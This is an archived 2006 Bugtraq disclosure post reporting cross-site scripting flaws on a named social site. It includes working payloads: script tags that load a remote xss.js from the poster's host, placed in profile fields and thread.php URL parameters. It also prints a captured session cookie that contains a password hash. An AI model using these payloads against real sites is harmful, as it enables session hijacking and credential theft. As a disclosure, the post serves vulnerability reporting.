lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060612094837.13151.qmail@securityfocus.com>
Date: 12 Jun 2006 09:48:37 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Yourfacesucks.com - XSS & cookie disclosure


Yourfacesucks.com

Homepage:
http://www.yourfacesucks.com

Effected files:

music/video input boxes in editing profile
subject box of sending a PM
thread.php

---------------------------------------

XSS Vuln with cookie disclosure in profile input boxes:

No filter evasion needed here. For PoC try putting <SCRIPT SRC=http://ha.youfucktard.com/xss.js></SCRIPT> in Music/Video input box.

And the cookie data we see is:
This is remote text via xss.js located at youfucktard.com PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; onlineid=274562 


Breaking down our cookie:
PHPSESSID = (Our php session ID)

db_user= (Our username)

loggedin= (Logged in:yes)

staus=0 (Probably means our profile has not been approved yet

sessuid = (Session userid)

md5pass= (md5 hash of our password)

onlineid= (Our userid #)

So, now we know our username (luny666) and our password hash, which can easily be cracked.

Screenshots:
http://www.youfucktard.com/xsp/facesucks1.jpg
http://www.youfucktard.com/xsp/facesucks2.jpg

----------------------------------------------

Sending PM's XSS Vuln:

No filter evasion needed,in the subject box put:
<IMG SRC=javascript:alert('XSS')>

Screenshot:
http://www.youfucktard.com/xsp/facesucks3.jpg

----------------------------------------------

Viewing threads on thread.php:

Escaping quotes with a few empty tags try putting this for a PoC

Viewing the forum (The whole page fills with this vuln, got about 25 popups with this):

http://www.yourfacesucks.com/forums/thread.php?forumid=15">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">


Viewing a specific thread in the forum:

http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ